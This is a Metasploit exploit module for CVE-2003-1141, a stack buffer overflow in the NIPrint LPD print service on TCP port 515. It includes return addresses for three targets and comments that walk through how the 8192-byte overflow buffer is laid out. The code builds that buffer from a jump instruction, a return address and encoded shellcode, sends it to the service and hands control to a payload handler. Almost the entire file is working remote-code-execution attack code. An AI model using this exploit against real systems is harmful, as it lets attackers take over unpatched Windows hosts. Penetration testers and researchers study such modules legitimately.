##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata consumed by the framework: name, references, the
  # payload constraints (500 bytes max, no 0x00 / 0x0a bytes) and three
  # return-address targets (one tied to NIPrint3.EXE itself, two tied to
  # a specific Windows build). The only registered option is RPORT,
  # which defaults to the LPD port, 515/tcp.
  #
  # @param info [Hash] module info supplied by the framework, merged via update_info
  def initialize(info = {})
    module_info = {
      'Name'           => 'NIPrint LPD Request Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the
        Network Instrument NIPrint LPD service. Inspired by
        Immunity's VisualSploit :-)
      },
      'Author'         => %w[hdm],
      'License'        => MSF_LICENSE,
      'References'     => [
        ['CVE', '2003-1141'],
        ['OSVDB', '2774'],
        ['BID', '8968'],
        ['URL',   'http://www.immunitysec.com/documentation/vs_niprint.html'],
      ],
      'Privileged'     => false,
      'Payload'        => {
        'Space'    => 500,
        'BadChars' => "\x00\x0a",
        'StackAdjustment' => -3500,
      },
      'Platform'       => 'win',
      'Targets'        => [
        ['NIPrint3.EXE (TDS:0x3a045ff2)', { 'Ret' => 0x00404236 }], # jmp esi
        ['Windows XP SP3', { 'Ret' => 0x7C9D30E3 }],
        ['Windows 7 x64', { 'Ret' => 0x763B35DD }],
      ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Nov 05 2003',
    }
    super(update_info(info, module_info))

    register_options([Opt::RPORT(515)])
  end

  # Sends one oversized (8192-byte) request over the TCP connection
  # opened by the Tcp mixin, then hands control to the payload handler.
  #
  # Buffer layout, as built below:
  #   bytes 0..1   -> "\xeb\x33" (an x86 short jmp)
  #   bytes 49..52 -> the selected target's return address, little-endian
  #   bytes 53..   -> the encoded payload
  # Every other byte is random alphanumeric filler, so the request body
  # differs on each run apart from those three fixed regions.
  def exploit
    connect

    buf = rand_text_alphanumeric(8192)
    ret_bytes = [target.ret].pack('V')
    shellcode = payload.encoded

    buf[0, 2] = "\xeb\x33"
    buf[49, 4] = ret_bytes
    buf[53, shellcode.length] = shellcode

    print_status("Trying target #{target.name}...")
    sock.put(buf)

    handler
    disconnect
  end
end
